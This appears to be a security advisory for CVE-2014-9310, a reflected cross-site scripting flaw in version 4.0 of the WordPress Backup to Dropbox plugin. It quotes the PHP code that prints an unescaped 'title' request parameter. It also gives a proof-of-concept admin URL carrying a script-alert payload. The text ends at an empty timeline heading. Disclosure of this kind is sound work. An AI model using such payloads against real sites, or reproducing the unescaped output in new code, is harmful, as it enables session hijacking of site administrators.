WordPress Backup to Dropbox 4.0 Reflected XSS

Homepage:

https://wordpress.org/plugins/wordpress-backup-to-dropbox/

CVE-ID

CVE-2014-9310

CVSS Score

4

CVSS Vector

(AV:N/AC:L/Au:S/C:P/I:N/A:N)

Description:

wpb2d-premium.php is visible on ?page=backup-to-dropbox-premium:

File: wordpress-backup-to-dropbox\wp-backup-to-dropbox.php

add_submenu_page('backup-to-dropbox', $text, $text, 'activate_plugins', 'backup-to-dropbox-premium', 'backup_to_dropbox_premium');
function backup_to_dropbox_premium()
{
    wp_enqueue_script('jquery-ui-core');
    wp_enqueue_script('jquery-ui-tabs');

    $uri = rtrim(WP_PLUGIN_URL, '/') . '/wordpress-backup-to-dropbox';
    include 'Views/wpb2d-premium.php';
}

$_REQUEST['title'] is not escaped.

File: wordpress-backup-to-dropbox\Views\wpb2d-premium.php

if (isset($_REQUEST['title'])) {
    add_settings_error('general', 'wpb2d_premium_success', sprintf(__('You have succesfully purchased %s.', 'wpbtd'), "<strong>{$_REQUEST['title']}</strong>"), 'updated');
}

Proof of Concept:

XSS will be visible for admin:

http://wordpress-install/wp-admin/admin.php?page=backup-to-dropbox-premium&title=<script>alert(String.fromCharCode(88,83,83));</script>

Timeline: